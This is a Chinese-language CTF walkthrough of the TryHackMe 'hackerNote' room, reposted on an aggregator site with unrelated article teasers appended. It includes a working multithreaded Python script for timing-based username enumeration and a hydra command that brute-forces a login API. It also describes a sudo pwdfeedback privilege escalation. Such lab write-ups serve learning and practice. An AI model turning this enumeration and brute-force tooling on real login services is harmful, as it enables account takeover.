TryHackMe-hackerNote

news2025/1/12 7:53:37

hackerNote

自定义 Web 应用程序,引入用户名枚举、自定义单词列表和基本权限提升漏洞。


端口扫描

循例 nmap

在这里插入图片描述

Web

80和8080都是一样的页面,并且存在一个登录页面

在这里插入图片描述

除此之外还有另一个信息就是它只有一个用户

存在注册功能,我们注册一个用户并登录

在这里插入图片描述

Get a Trick

根据thm的引导,我们退出登录

尝试登录无效的账户,而收到登录失败这个响应的时间是差不多2秒

而尝试登录已存在的账户,这个时间则是3秒

我们就可以利用此微妙的细节来进行用户枚举

这里通过自己写的多线程py脚本来枚举

由于openvpn不是特别稳定,容易导致极大的网络延迟,建议在攻击盒上运行脚本

import requests
from threading import Thread
import time
import sys

thread_num = int(sys.argv[2])
dictPath = sys.argv[1]
thread_list = []
url = "http://10.10.252.137/api/user/login"
valid_list = []


def login(*userList):
    for user in userList:
        data = {"username":user.strip(), "password":"123"}
        start_time = time.time()
        requests.post(url, json=data)
        end_time =time.time()
        ttime = end_time - start_time
        print(ttime)
        if ttime >= 1.0:
            print(f"find: {user}")
            sys.exit()


if __name__ == "__main__":

    user_list = open(dictPath).readlines()

    length = len(user_list)
    step = int(length / thread_num) + 1

    for start in range(0, length, step):
        sub_user_list = user_list[start:start + step]
        t = Thread(target=login, args=(sub_user_list))
        thread_list.append(t)
        t.start()

    for t in thread_list:
        t.join()

    print("done")

房间中给了一个缩短的字典,利用这个字典很快就能爆出用户名

在这里插入图片描述

密码爆破

密码提示是“我最喜欢的颜色和我最喜欢的数字”

因此我们可以获得颜色的单词列表和数字的单词列表,并使用Hashcat Util的Combinator将它们组合在一起,这将为我们提供两个单词表的每个组合。使用此词表,我们可以使用 Hydra 攻击登录 API 路由并找到用户的密码。下载附加的单词列表文件,查看它们,然后使用hashcat-util的组合器组合它们。

Hashcat utils可以从以下位置下载: https://github.com/hashcat/hashcat-utils/releases

生成密码字典:

在这里插入图片描述

有了字典就可以开始爆破,使用hydra:

hydra -l james -P ./wordlist.txt 10.10.252.137 http-post-form '/api/user/login:username=james&password=^PASS^:F=Invalid'

在这里插入图片描述

登录james,发现直接给出了ssh密码

在这里插入图片描述

sudo缓冲区溢出提权

直接登录ssh,拿到user.txt

在这里插入图片描述

房间引导我们查看sudo -l,当前用户无法以 root 身份运行任何命令。但是,您可能已经注意到,当您输入密码时,您会看到星号。这不是默认行为。最近发布的 CVE 会影响此配置。该设置称为 pwdfeedback

我们稍后也将去另一个房间学习这个漏洞

房间为我们提供了exp,我们直接下载过来用

在这里插入图片描述

成功getroot,root.txt还在老地方


结束

其实这个房间最有意思的点在用户枚举的部分,非常的细节,虽然在thm的burp教程当中有教过类似的时间戳查看方法,但这是第一次将其应用于实践,并且还是自己写脚本,这是非常棒的

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/379716.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

AntDB数据库首个社区版正式发布,携手生态更多可能

3月1日,亚信科技AntDB数据库社区版正式开放免费下载。作为AntDB数据库的首个社区版产品,AntDB-CE(Community Edition ) V7.2.0具有完整、易用、兼容度高的企业级分布式数据库产品特性,提供了详细的在线文档支持&#x…

Kafka基本原理

总述 简介 Kafka是最初由Linkedin公司开发,是一个分布式、支持分区的(partition)、多副本的(replica),基于zookeeper协调的分布式消息系统,它的最大的特性就是可以实时的处理大量数据以满足各…

高清无线手机投屏电脑软件Airserver7全平台兼容

Airserver是一款优质的手机投屏软件,搭配了可调节的分辨率模式,针对不同的网络配置,还专门研发了低数据模式以及硬件加速功能,全方位保证投屏画面的清晰度。除此之外,通过调整画面的色彩变化,还可以增强用户…

OpenWrt介绍及编译基础教程

关于OpenWrt OpenWRT是一个高度模块化、高度自动化的嵌入式Linux系统,拥有强大的网络组件和扩展性,常常被用于工控设备、电话、小型机器人、智能家居、路由器以及VOIP设备中。 同时,它还提供了100多个已编译好的软件,而且数量还在…

SC12B触摸感应芯片评测方案(1)

MM32F0160SC12B Touch Application Evaluation 文章目录MM32F0160SC12B Touch Application EvaluationIntroduction & RequirementHardwareSC12B & SC12B Sample Demo boardMini-F0160 boardSoftwareMCU Software - MM32F0160PC Tool - FreeMASTERSummaryIntroduction …

Jupyter Lab | “丢下R,一起来快乐地糟蹋服务器!”

写作前面 工具永远只是为了帮助自己提升工作效率 —— 沃兹基硕得 所以说,为什么要使用jupyterlab呢?当然是因为基于服务器来处理数据就可以使劲造了,而且深切地感觉到,“R这玩意儿是人用的吗”。 jupyter-lab | mamba安装以及…

【微信小程序】-- 全局配置 -- window - 导航栏(十五)

💌 所属专栏:【微信小程序开发教程】 😀 作  者:我是夜阑的狗🐶 🚀 个人简介:一个正在努力学技术的CV工程师,专注基础和实战分享 ,欢迎咨询! &…

Thymeleaf -- 视图模块

添加thymeleaf的jar包2. 新建一个Servlet类ViewBaseServletpublicclassViewBaseServletextendsHttpServlet { ​privateTemplateEnginetemplateEngine; ​Overridepublicvoidinit() throwsServletException { ​// 1.获取ServletContext对象ServletContextservletContextthis.g…

人大金仓和达梦的空间数据能力对比

一、总得来说: 人大金仓底层更解决于pg数据库, 人大金仓的空间能力基于postgis能力来实现,能力挺强大的. 细节上人大金仓的架构上也对空间的支持框架做的比达梦更加完善。例如数据库的集群能力,并行计算能力,空间数据…

使用热成像仪完成地暖检测应用

家庭地暖已逐步全面走进北方家庭中,常见的地暖系统分为两类,一类为电地暖,一类为水地暖,其常见问题为地暖发热不均,地暖不热或水暖管渗漏等问题。地暖系统在保障温暖及美观的同时,一直存在维修困难的问题&a…

最流行的自动化测试工具,总有一款适合你(附部分教程)

前言 在自动化测试领域,自动化工具的核心地位毋庸置疑。本文总结了最顶尖的自动化测试工具和框架,这些工具和框架可以帮助组织更好地定位自己,跟上软件测试的趋势。这份清单包含了开源和商业的自动化测试解决方案。 1)Selenium …

第六章 图

文章目录前言知识框架数据结构的区分1. 图的基本概念1.1 图的定义1.2 图的基本概念和术语总结前言 参考文献:数据结构:图(Graph)【详解】 知识框架 数据结构的区分 线性表:数据元素之间是被串起来的,仅有线性关系,每…

Centos和Window系统下Frp内网穿透

frp 是一个高性能的内网穿透的反向代理软件,支持 TCP、UDP、HTTP、HTTPS 等常见协议(TCP最常用),可以将处于局域网或者家用电脑主机、办公电脑主机通过中转服务器的方式暴露在公网里,使用户可以通过访问公网的IP(域名)…

【数电基础】——触发器

目录 1.大纲 2.双稳态电路 3. SR锁存器(或非门构成) 4.SR锁存器(与非门构成) 5.门控SR锁存器(与非门构成) 6.触发器 1.D触发器 (电平触发) 2.D触发器(上升沿触发&am…

腾讯会议演示者视图/演讲者视图

前言 使用腾讯会议共享PPT时,腾讯会议支持共享用户使用演示者视图/演讲者视图,而会议其他成员可以看到正常的放映视图。下面以Win10系统和Office为例,介绍使用步骤。值得一提的是,该方法同时适用于单显示屏和多显示屏。 腾讯会议…

详解JAVA注解

目录 1.基本注解 2.元注解 3.自定义注解 4.底层实现 1.基本注解 基本注解是JDK自带的一些单独使用的具有功能性的注解,包含以下四个: Override表示方法重写Deprecated表示方法过期,下个版本可能删除SuppressWarnings用于抑制告警SafeVa…

大学生创业有优势吗?创业方向应该如何选择?

大学生创业有优势吗? 目前,许多学校都有孵化器、创业基地等。大学生可以以极低的成本和成本在外面拥有相同质量的办公室和仓库,大学生的创业成本再次降低。 而且很多学校规定大学生可以无限期休学创业,这也消除了大学生创业失败…

深入分析Linux虚拟化KVM-Qemu之ioeventfd与irqfd

说明: KVM版本:5.9.1 QEMU版本:5.0.0 工具:Source Insight 3.5, Visio 1. 概述 ​ 图中的各个模块,只剩下通知机制没讲了,本文来一篇终结者; Guest与KVM及Qemu之间的通知机制&…

wordpress从宝塔升级到docker

15还是16年的时候买的阿里云和腾讯云最低配的1核1G。腾讯云和阿里云后来都涨价了,退了涨价多的那个腾讯云,阿里云一直续费到现在,wordpress这个最早的时候是用军哥的lnmp的一键包搭建的,后来改成用了带UI的宝塔,宝塔用…

4.文件管理

文章目录1、初识文件管理1.1、回顾1.2、文件的属性1.3、无结构文件/有结构文件1.4、文件之间应该怎样组织起来?1.5、操作系统应该向上提供哪些功能?1.6、从上往下看,文件应如何存放在外存?1.7、其他需要由操作系统实现的文件管理功…